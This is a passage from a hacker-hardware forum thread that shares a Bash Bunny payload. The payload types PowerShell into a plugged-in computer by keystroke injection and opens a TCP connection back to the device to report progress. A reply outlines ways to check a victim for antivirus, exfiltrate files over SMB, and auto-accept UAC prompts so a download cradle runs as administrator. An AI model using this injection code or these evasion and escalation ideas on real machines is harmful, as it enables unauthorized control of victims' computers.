Jump to content

[PAYLOAD] powershell to bunny progress/status


Cribbit
 Share

Recommended Posts

I don't know if this will be any use to anyone but. i create a poc to demonstrate sending the a status/progress of a powershell script to the bunny. The ps only send number 1,2 (3or4) & 5 with sleeps in between. And the bunny just changes it's LED depending on the number. when it get a 5 it quack the command to closes the powershell windows.

 

#!/bin/bash
trap "kill 0" EXIT

LED SETUP

ATTACKMODE RNDIS_ETHERNET HID

GET SWITCH_POSITION
GET HOST_IP

cd /root/udisk/payloads/$SWITCH_POSITION/

FILE=data.txt
#Clear old commands
if [ -f "$FILE" ]; then
    cat /dev/null > "$FILE"
fi

LED SPECIAL
# Set up an echo command to right to file.
# using echo as nc only finish writing when the connection closes.
CMD="while true; do read i && echo \$i >> $FILE ; done"
# set nc to run in its own process
nc -lvn -p 8080 -c "$CMD" &
# give nc time to start
sleep 1
# set the last command to empty
last="";

LED ATTACK

Q DELAY 200
RUN WIN "powershell"
Q DELAY 100
# Create a connect object 
Q STRING "\$client = New-Object System.Net.Sockets.TcpClient;"
Q DELAY 100
# set the host and port and connect to nc
Q STRING "\$client.Connect(\"$HOST_IP\",8080);"
Q DELAY 100
# create a stream for that connection
Q STRING "\$stream = new-object System.IO.StreamWriter \$client.GetStream();"
Q DELAY 100
# get powershell to sleep
Q STRING "Start-Sleep -Seconds 3;"
Q DELAY 100
# the 1 the the stream
Q STRING "\$stream.WriteLine(\"1\");"
Q DELAY 100
# push this over to nc
Q STRING "\$stream.Flush();"
Q DELAY 100
Q STRING "Start-Sleep -Seconds 3;"
Q DELAY 100
Q STRING "\$stream.WriteLine(\"2\");"
Q DELAY 100
Q STRING "\$stream.Flush();"
Q DELAY 100
Q STRING "Start-Sleep -Seconds 3;"
Q DELAY 200
# Send a 3 or 4
Q STRING "\$stream.WriteLine((3+(Get-Random -Maximum 2)).ToString());"
Q DELAY 100
Q STRING "\$stream.Flush();"
Q DELAY 100
Q STRING "Start-Sleep -Seconds 3;"
Q DELAY 100
Q STRING "\$stream.WriteLine(\"5\");"
Q DELAY 100
Q STRING "\$stream.Flush();"
Q DELAY 100
#Close connection
Q STRING "\$client.Close();"
Q DELAY 100
Q ENTER

LED SPECIAL
# forever loop
while :
do
	# get the last line of the file removing line feeds (10) and carriage returns (13)
	curr=$(tail -1 "$FILE" | tr -d '\r\n')
	#curr=$(tail -1 "$FILE" | sed -e 's/[\r\n]//g')
	# see if the last command is different to the curr command
	if [ "$last" != "$curr" ] ;
	then
		# set the last to the current command
		last="$curr"
		# go to the section based on the command
		# most just change led color and rate on flashing.
		case $curr in
			1) 
				LED STAGE1;;
			2) 
				LED SPECIAL2;;
			3) 
				LED STAGE3;;
			4) 
				LED STAGE4;;
			5) 
				LED SPECIAL5
				Q DELAY 100
				# close powershell
				Q STRING "exit"
				Q ENTER
				break;;
		esac
	fi
done

LED FINISH
sleep 1

The powershell is all on different lines just to make it easy to read.

As i said don't know if this will of any uses to anyone but it may you never know may spark an idea in someone else

Edited by Cribbit
  • Like 2
Link to comment
Share on other sites

  • 3 weeks later...

The BBTPS I wrote has a means for you to report back to it from your payload to grab additional jobs/payloads.  Good for cases where you want to check if it is safe to pull down possible detectable code if it is safe..like no AV.  Also to check if a victim meets conditions before pulling down a larger script to run.

 

I been sidetracked and done very little with newer version converted from nodejs to golang for the server and the update the SMB part for file exfiltrations but that should give you some ideas for what to do with it.  Also wanted to add quack back for smarter Admin detection like run and if admin is detected then send command to BB to get ready to send alt-y in 5secs and then try and launch new download cradle with admin privs.  When UAC kicks off the BB within 5 seconds of command will alt-Y it and there you go.  If no admin, then the download can request non-admin jobs/payloads.

 

So there is some ideas for ya.

Link to comment
Share on other sites

  • 2 months later...

Hi PoSHMagiC0de

Have not been on the forums for a bit. Your BBTPS looks really interesting with the ability to run multi payloads/jobs and SMB sever.

Thanks for the idea's.

If I find time i may do something with this script.

Whats is it

When your a kid you have time but no money. When you work you have money but no time.
and if you're in a dead end job you have no time or money. 😉

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...